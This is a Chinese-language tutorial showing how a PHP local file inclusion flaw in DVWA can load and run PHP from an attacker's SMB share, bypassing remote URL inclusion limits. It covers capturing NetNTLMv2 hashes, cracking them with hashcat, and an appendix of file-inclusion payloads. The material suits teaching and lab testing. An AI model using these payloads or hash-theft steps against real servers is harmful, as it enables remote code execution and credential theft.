PHP远程文件包含(RFI)并绕过远程URL包含限制
PHP远程文件包含(RFI)并绕过远程URL包含限制
前言
本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_url_fopen、allow_url_include“均为“off”的情况下,不允许PHP加载远程HTTP或FTP的url进行远程文件包含时。我们依旧可以使用SMB,来加载执行远程文件。
攻击思路
攻击者在发现目标服务器存在本地文件包含的情况下。可以通过配置SMB服务器,启用匿名浏览访问。利用有漏洞的PHP代码从SMB共享里访问PHP程序文件,查看代码是否被执行。
环境设置
1、配置php.ini文件禁用"allow_url_fopen" 和 "allow_url_include"
2、利用具有本地文件包含漏洞的程序,这里我们使用DVWA演示
3、使用impacket攻击框架中的smbserver
查看坏境
当前配置PHP版本为“7.3.4”:
确定PHP不允许远程文件包含
试图从我们kali主机包含文件时,应用程序抛出错误并且没有发生RFI
在kali上配置我们的SMB服务器
创建演示php程序文件
通过smbserver启动smb服务器
攻击文件包含漏洞参数
利用SMB的访问路径传入文件包含漏洞的参数里。
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=\\192.168.0.101\share\phpinfo.php
目标机器从SMB共享中获取PHP文件并在应用程序服务器上顺利执行PHP代码,绕过了远程文件包含的限制。
攻击的同时我们在smbserver窗口也捕获到了NET-NTLMhash
最终我们不但成功执行了我们的php文件,同时我们还得到了远程系统用户的NET-NTLMhash。对于攻击思路,这边可以拓展一些,还可以对我们拿到的NET-NTLMhash进行破解。也可以使用Responder ntlmrelayx.py工具进行smb中继攻击,这里就不做详细讨论。
附加:hashcat对NET-NTLMhash
NTLMv2的格式为:
username::domain:challenge:HMAC-MD5:blob
hashcat -a 0 -m 5600 hash.txt wordlist--force-m: hash-type,5600对应NetNTLMv2,查看hash对应的具体参数可以查看官方样例:
https://hashcat.net/wiki/doku.php?id=example_hashes
-a 0:字典破解
–force代表强制执行,测试系统不支持Intel OpenCL
成功破解出登录的明文密码,输出如下图
附录 allow_url_fopen和allow_url_include对文件包含的影响
allow_url_fopen #允许url打开远程文件,如果url传入的参数是本地文件的不受此限制
当allow_url_fopen打开,allow_url_include关闭时
/fi/?page=file1.php #可以使用
/fi/?page=php://filter/read=convert.base64-encode/resource=D:\phpstudy_pro\WWW\one.txt #可以使用
/fi/?page=file://D:\phpstudy_pro\WWW\one.txt #可以使用
/fi/?page=http://127.0.0.1/one.txt #不可以使用
/fi/?page=data:text/plain;base64,cXdlcmFhYQ== #不可以使用
/fi/?page=php://input #不可以使用当关闭了allow_url_open和allow_url_include时
/fi/?page=file1.php #可以使用
/fi/?page=file://D:\phpstudy_pro\WWW\one.txt #可以使用
/fi/?page=php://filter/read=convert.base64-encode/resource=D:\phpstudy_pro\WWW\one.txt #可以使用
/fi/?page=http://127.0.0.1/one.txt #不可以使用
/fi/?page=data:text/plain;base64,cXdlcmFhYQ== #不可以使用
/fi/?page=php://input #不可以使用当allow_url_open关闭时,而allow_url_include开启的时候,只有php://input可以使用。php://input可以读取没有处理过的POST数据。php://input这个是不受allow_url_fopen影响。